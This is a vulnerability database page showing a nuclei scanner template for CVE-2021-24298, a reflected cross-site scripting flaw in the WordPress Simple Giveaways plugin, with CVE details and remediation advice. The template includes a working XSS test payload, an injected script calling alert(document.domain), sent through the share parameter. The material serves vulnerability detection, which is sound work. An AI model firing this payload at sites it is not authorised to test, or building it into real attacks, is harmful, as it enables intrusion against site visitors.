Lucene search
+L

WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting

🗓️ 09 Aug 2026 02:40:59Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 70 Views

WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-24298
24 May 202111:15
attackerkb
cnnvd
CNNVD
giveasap 跨站脚本漏洞
24 May 202100:00
cnnvd
cve
CVE
CVE-2021-24298
24 May 202110:58
cve
cvelist
Cvelist
CVE-2021-24298 Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
24 May 202110:58
cvelist
nvd
NVD
CVE-2021-24298
24 May 202111:15
nvd
osv
OSV
CVE-2021-24298
24 May 202111:15
osv
patchstack
Patchstack
WordPress Simple Giveaways plugin <= 2.36.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability
9 May 202100:00
patchstack
prion
Prion
Cross site scripting
24 May 202111:15
prion
redhatcve
RedhatCVE
CVE-2021-24298
22 May 202519:21
redhatcve
wpexploit
wpexploit
Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
9 May 202100:00
wpexploit
Rows per page
id: CVE-2021-24298

info:
  name: WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability.
  reference:
    - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/
    - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24298
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24298
    cwe-id: CWE-79
    epss-score: 0.03451
    epss-percentile: 0.87881
    cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: ibenic
    product: "simple_giveaways"
    framework: wordpress
  tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '= Simple Giveaways'

  - method: GET
    path:
      - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e0c9dbe5cb774cdf311e69bbea2c164e2dd4bb012343fa2815e644247c2e5989022100916d071129a5867153b7032c99de7386e992e93adf334272bd38faad2576903e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 24.3
CVSS 3.16.1
EPSS0.03451
70